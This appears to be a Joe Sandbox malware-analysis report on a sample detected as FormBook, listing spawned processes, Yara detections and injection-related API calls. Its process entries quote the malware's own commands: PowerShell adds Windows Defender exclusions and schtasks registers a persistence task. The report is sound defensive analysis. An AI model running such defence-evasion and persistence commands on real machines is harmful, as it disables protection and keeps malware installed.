Nov 11, 2024 06:54:02.623016119 CET	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 05:54:02 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66aa3a46-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Target ID:	0
Start time:	00:49:54
Start date:	11/11/2024
Path:	C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe"
Imagebase:	0x670000
File size:	905'736 bytes
MD5 hash:	9C0CF646FC8BC953E11228211A03DEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	00:50:02
Start date:	11/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe"
Imagebase:	0x8e0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	00:50:02
Start date:	11/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	00:50:02
Start date:	11/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe"
Imagebase:	0x8e0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	00:50:02
Start date:	11/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	00:50:02
Start date:	11/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vssfbkdOErXuYi" /XML "C:\Users\user\AppData\Local\Temp\tmp6426.tmp"
Imagebase:	0x480000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	00:50:02
Start date:	11/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	00:50:03
Start date:	11/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0xdc0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1976879958.0000000006940000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1895730632.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1897010665.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	00:50:03
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe
Imagebase:	0x740000
File size:	905'736 bytes
MD5 hash:	9C0CF646FC8BC953E11228211A03DEC8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 32%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	00:50:06
Start date:	11/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	00:50:09
Start date:	11/11/2024
Path:	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe"
Imagebase:	0xa30000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.4127873755.00000000040F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	00:50:12
Start date:	11/11/2024
Path:	C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\icacls.exe"
Imagebase:	0x120000
File size:	29'696 bytes
MD5 hash:	2E49585E4E08565F52090B144062F97E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4127950184.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4128067696.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4126760720.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	00:50:14
Start date:	11/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vssfbkdOErXuYi" /XML "C:\Users\user\AppData\Local\Temp\tmp91BE.tmp"
Imagebase:	0x480000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	00:50:14
Start date:	11/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	00:50:14
Start date:	11/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0xa30000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	00:50:24
Start date:	11/11/2024
Path:	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe"
Imagebase:	0xa30000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.4129656762.0000000004EC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	00:50:37
Start date:	11/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	174
Total number of Limit Nodes:	7

Executed Functions

Function 073F7950 Relevance: .6, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792940305.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73f0000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7578ca86b12fbf4d0e061821c965fb9daf87746e4767c50af3a5a865d478a762
Instruction ID: fb079ec7e2914cf0eea9be2e634b4bb88d511d6aecbfcc6c6c8cbe84f940e5a5
Opcode Fuzzy Hash: 7578ca86b12fbf4d0e061821c965fb9daf87746e4767c50af3a5a865d478a762
Instruction Fuzzy Hash: E132DFB0B012059FEB19DBB9D550BAEB7F6AF89340F544469E249DB3A0CB34ED01CB91

Function 073F5CD2 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792940305.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73f0000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39563465a9ebae7e6e2114814088d35db887f19a71860616dc1d5491cdf87272
Instruction ID: 84b3a46d74a6e8ec31b70cbd03fad9cb90d70fd9631d7fc16b98655cccde20c7
Opcode Fuzzy Hash: 39563465a9ebae7e6e2114814088d35db887f19a71860616dc1d5491cdf87272
Instruction Fuzzy Hash: 08D05BDA95E285EBC70145A028021F4BB7C9A47061F4520B1CA5D96D97D20444184214

Function 073F280D Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 073F2A4E

Memory Dump Source

Source File: 00000000.00000002.1792940305.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73f0000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6727ac9a921cc2a9e9993cb1c6121b8bcc3fcc3a34a7874638a9dd21e01e2bed
Instruction ID: 4626cd63edf0a1342bc8e0f8ce2de76c031fdd786d8aedcdd95624f91fab326a
Opcode Fuzzy Hash: 6727ac9a921cc2a9e9993cb1c6121b8bcc3fcc3a34a7874638a9dd21e01e2bed
Instruction Fuzzy Hash: 9FA180B1D0021ACFEF10DF68C8417DEBBB2BF48354F1481A9E949A7250DB749985CF92

Function 073F2818 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 073F2A4E

Memory Dump Source

Source File: 00000000.00000002.1792940305.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73f0000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1df27c820fea470a7e640f306a19f2a290072be5aa5017002ef1050ddd8d2fcd
Instruction ID: 7eca5460c6ae204d70cca15368c861495f8487fd606dd5d767939b90780d34e2
Opcode Fuzzy Hash: 1df27c820fea470a7e640f306a19f2a290072be5aa5017002ef1050ddd8d2fcd
Instruction Fuzzy Hash: 1C917FB1D0021ACFEF10DF68C8417DEBBB2BF48354F1481A9E949A7240DB749985CF92

Function 04EBB2F9 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 04EBB55E

Memory Dump Source

Source File: 00000000.00000002.1781677660.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4eb0000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 4c24ae26e2f4d233d24a151e2e84eb8cdf182cc63e04e3c9d5a6bacc6ee39ffb
Instruction ID: f8d62d9eabb855a466fc4842011db18c46d92283887209b6f58745b00b3b4643
Opcode Fuzzy Hash: 4c24ae26e2f4d233d24a151e2e84eb8cdf182cc63e04e3c9d5a6bacc6ee39ffb
Instruction Fuzzy Hash: 7F811370A00B058FDB24DF29D15179ABBF2FB88304F148A29D48ADBA50E775F945CB91

Function 04EB58EC Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 04EB59A9

Memory Dump Source

Source File: 00000000.00000002.1781677660.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4eb0000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 70325c6c29533879187ee0d4697e8a6e393bce5e60b623d7c72d2e1b0959fd94
Instruction ID: fd81a4bebf08e6d6985365d9adc9c144a09a2503c922971001510eb6e1692109
Opcode Fuzzy Hash: 70325c6c29533879187ee0d4697e8a6e393bce5e60b623d7c72d2e1b0959fd94
Instruction Fuzzy Hash: B341D3B0C00719DBDB24DFA9C8846CEBBB5BF45308F24806AD448BB255DB756946CF90

Function 04EB44D4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 04EB59A9

Memory Dump Source

Source File: 00000000.00000002.1781677660.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4eb0000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d3457237eabb1f00043b5044fa95b44d0734cb65f96bdc0abb516e34fa9f724c
Instruction ID: 8891d5bba81ceb472eaace5f5aef1c9c931fc52b74c76eb5d231711accb2ec01
Opcode Fuzzy Hash: d3457237eabb1f00043b5044fa95b44d0734cb65f96bdc0abb516e34fa9f724c
Instruction Fuzzy Hash: F441F1B0C00719DBDB24DFA9C844BDEBBB5BF49308F20806AD448BB251DB75694ACF90

Function 073F2589 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 073F2620

Memory Dump Source

Source File: 00000000.00000002.1792940305.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73f0000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b511a9db45a6d9bc18d5610818d56f066a539fed2bf0f09e7899b71eb710191d
Instruction ID: ae3f92ee22a449e2379090f1cc8f8e532d74994fd5a4d4f820ddf8f0280cf62a
Opcode Fuzzy Hash: b511a9db45a6d9bc18d5610818d56f066a539fed2bf0f09e7899b71eb710191d
Instruction Fuzzy Hash: AB2157B1900319DFDB10DFA9C881BDEBBF4FF48324F108429E918A7240C7789954CBA4

Function 073F2590 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 073F2620

Memory Dump Source

Source File: 00000000.00000002.1792940305.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73f0000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 617602a298068217692b0f130ed0ab230a4cb468561b90fdd64bf9242d2ae5b8
Instruction ID: d60f1913fcc5091e71414865ff93c11998175ec244fb1ecb1eecf8e1f30ec6e3
Opcode Fuzzy Hash: 617602a298068217692b0f130ed0ab230a4cb468561b90fdd64bf9242d2ae5b8
Instruction Fuzzy Hash: B92155B1900319DFDB10DFA9C884BDEBBF4FF48320F10842AE958A7240C7789944CBA4

Function 073F2679 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 073F2700

Memory Dump Source

Source File: 00000000.00000002.1792940305.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73f0000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 402bae9f4b600565f59be23762ee2454051b8996db36b819bef709ecbfc28976
Instruction ID: 6dda50ac897159179ce0a9d836c43410782954dfcda16e27b063109b38e23805
Opcode Fuzzy Hash: 402bae9f4b600565f59be23762ee2454051b8996db36b819bef709ecbfc28976
Instruction Fuzzy Hash: E62166B1C002499FCB10DFAAC881AEEFBF4FF48310F50842AE958A7251C7399955CBA5

Function 073F23F0 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 073F2476

Memory Dump Source

Source File: 00000000.00000002.1792940305.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73f0000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 56103081f7f9ba654e1b1ed0a452aa86975cd57db542d84bead52f79fa6f5d4e
Instruction ID: 433c2d9a5cac2d6834f67fe3fbca6c3318a5791956b48ef37a455d57ca5c7a7e
Opcode Fuzzy Hash: 56103081f7f9ba654e1b1ed0a452aa86975cd57db542d84bead52f79fa6f5d4e
Instruction Fuzzy Hash: D52136B19002198FDB10DFAAC4857EEBBF4AB48324F148429D558A7241C778A585CBA5

Function 04EBD130 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,04EBD7AE,?,?,?,?,?), ref: 04EBD86F

Memory Dump Source

Source File: 00000000.00000002.1781677660.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4eb0000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: bd0fa995b1d61f740d950c1268f9fc2e17180279b81cd98c622946bcce6d834f
Instruction ID: 072e07f25120a1780709f9e59bad27669aa430ff4ba58bbe8f419adb05500f3c
Opcode Fuzzy Hash: bd0fa995b1d61f740d950c1268f9fc2e17180279b81cd98c622946bcce6d834f
Instruction Fuzzy Hash: 8821E5B59002189FDB10CF99D984ADEBFF8EB48314F14805AE954A7310D374A954CFA5

Function 073F2680 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 073F2700

Memory Dump Source

Source File: 00000000.00000002.1792940305.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73f0000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 9e035daf6afde85db13f927e0c2e17abee0b831ae13a67cfe2f700c9e71a4755
Instruction ID: 8c1aedeb2ce7c790dbc8c55b73a33b93657926c82a6ef943b6a10c598b730ac7
Opcode Fuzzy Hash: 9e035daf6afde85db13f927e0c2e17abee0b831ae13a67cfe2f700c9e71a4755
Instruction Fuzzy Hash: F12125B1C002599FDB10DFAAC885AEEFBF5FF48320F10842AE558A7251C7389944CBA4

Function 073F23F8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 073F2476

Memory Dump Source

Source File: 00000000.00000002.1792940305.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73f0000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 905244ce359a5e9556493966a922aa15a43b240aa257132acb432177dfea8680
Instruction ID: 6ddcfb5d74825f38d5aba224f8748d5ddf88136a451faee059eec0c3daa964fb
Opcode Fuzzy Hash: 905244ce359a5e9556493966a922aa15a43b240aa257132acb432177dfea8680
Instruction Fuzzy Hash: B42138B1D002198FDB10DFAAC4857EEBBF4EF48364F108429D559A7240CB789945CFA4

Function 04EBD7E0 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,04EBD7AE,?,?,?,?,?), ref: 04EBD86F

Memory Dump Source

Source File: 00000000.00000002.1781677660.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4eb0000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6b67ef23aed99aa239026e789f97df05414510d0c7b433673230b6c914cca271
Instruction ID: 74441f74b46c5a13fc23979937eff8d13ce754e9eb04fb13929047fc7d0fede4
Opcode Fuzzy Hash: 6b67ef23aed99aa239026e789f97df05414510d0c7b433673230b6c914cca271
Instruction Fuzzy Hash: 0D2103B5D002089FDB00CFA9D584ADEBBF5EB48320F14802AE954A7250D378A955CF64

Function 073F24C8 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 073F253E

Memory Dump Source

Source File: 00000000.00000002.1792940305.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73f0000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3d638467833344f566a15412c8d1dde2a133e32b8efe9ac93ef0e87329baa197
Instruction ID: 515ef844c780177dea3e674a8fc8b99b77f42ee5fb22a8b06f72de801f39e2bf
Opcode Fuzzy Hash: 3d638467833344f566a15412c8d1dde2a133e32b8efe9ac93ef0e87329baa197
Instruction Fuzzy Hash: B81144B58002499FDB10DFAAC844BEEFFF5EF88324F248419E559A7250C735A545CFA4

Function 073F2340 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 073F23AA

Memory Dump Source

Source File: 00000000.00000002.1792940305.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73f0000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: cd197588760e89803d48ae487a142d20d42f137386a57ac50ed88b3cbc546a18
Instruction ID: 39a1a706b7a6b72c498976dd91af593afecabd3752ae1bf2c8aa152fd1c1fbca
Opcode Fuzzy Hash: cd197588760e89803d48ae487a142d20d42f137386a57ac50ed88b3cbc546a18
Instruction Fuzzy Hash: F41149B19002498FDB10DFAAC4457DEFBF4EF88324F24842AD559A7250DB39A545CF94

Function 073F24D0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 073F253E

Memory Dump Source

Source File: 00000000.00000002.1792940305.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73f0000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9c277c1241778b3afe98efaed225b9bd48ce2aafbd651d464ac2a0ffc09e48a8
Instruction ID: 10504c448e26bd10c4fa1372549c33dcdf4ac2e094f425931990ada5a73c55aa
Opcode Fuzzy Hash: 9c277c1241778b3afe98efaed225b9bd48ce2aafbd651d464ac2a0ffc09e48a8
Instruction Fuzzy Hash: E21156B18002499FDB10DFAAC844ADFFBF5EB88324F208419E519A7250C735A544CFA0

Function 073F2348 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 073F23AA

Memory Dump Source

Source File: 00000000.00000002.1792940305.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73f0000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f9dc094111f0a809941d0583725bb9b1a0d5d253745625f40786c338a519aefc
Instruction ID: 78a1fb7ea7c72b2acfe48c5dac9558eefae23a32a029eb294525be4280cac9f1
Opcode Fuzzy Hash: f9dc094111f0a809941d0583725bb9b1a0d5d253745625f40786c338a519aefc
Instruction Fuzzy Hash: 12113AB5D002498FDB10DFAAC4457DFFBF4EB88324F20842AD559A7250C775A544CFA4

Function 073F6CE0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

